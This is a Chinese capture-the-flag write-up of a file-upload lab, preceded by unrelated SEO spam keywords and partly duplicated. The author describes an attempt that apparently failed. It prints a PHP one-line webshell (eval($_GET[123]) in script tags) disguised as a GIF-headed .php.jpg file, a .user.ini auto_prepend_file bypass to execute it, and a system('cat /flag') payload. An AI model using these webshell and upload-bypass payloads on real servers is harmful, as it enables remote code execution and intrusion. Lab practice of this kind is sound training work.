做美团网站多少钱,大学网页设计课程,手机兼职在家挣钱的方法,东莞公司网站进入靶场
文件上传
老规矩#xff0c;桌面有啥传啥 过滤了?
寻找不含?的一句话木马 文件名 123(2).php.jpg 文件内容 GIF89a? script languagephpeval($_GET[123]);/script 123即密码#xff0c;可凭借个人喜好更换 再上传一个文…
进入靶场
文件上传
老规矩桌面有啥传啥 过滤了?
寻找不含?的一句话木马 文件名 123(2).php.jpg 文件内容 GIF89a? script languagephpeval($_GET[123]);/script 123即密码可凭借个人喜好更换 再上传一个文件将jpg文件变成php文件执行
这里用到.htaccess发现不行
尝试.user.ini 文件名 123(3).user.ini 文件内容 GIF89a auto_prepend_file123(3).php.jpg 文件名 123(3).php.jpg 文件内容 GIF89a script languagephpsystem(cat /flag);/script 按理说该查看即可得到flag了 但查看时为空
看看是哪步出了问题
没有上传成功
修改文件名还是上传不成功
摧毁靶机重试 要么url中81就不见了像上图 要么返回上传页面 还发现不管上传什么路径都不变尝试上传下面这张图片还是那个路径不是路径变都不变还是没上传成功访问不到这只是一个中规中矩的图片 尝试修改文件那么多遍合着题目有问题 我再最后改一次
再开启一次靶场
还是不行
净是些让人破防的题
想到见到了很多次状态码500搜搜看什么意思 so???????????????????????????????
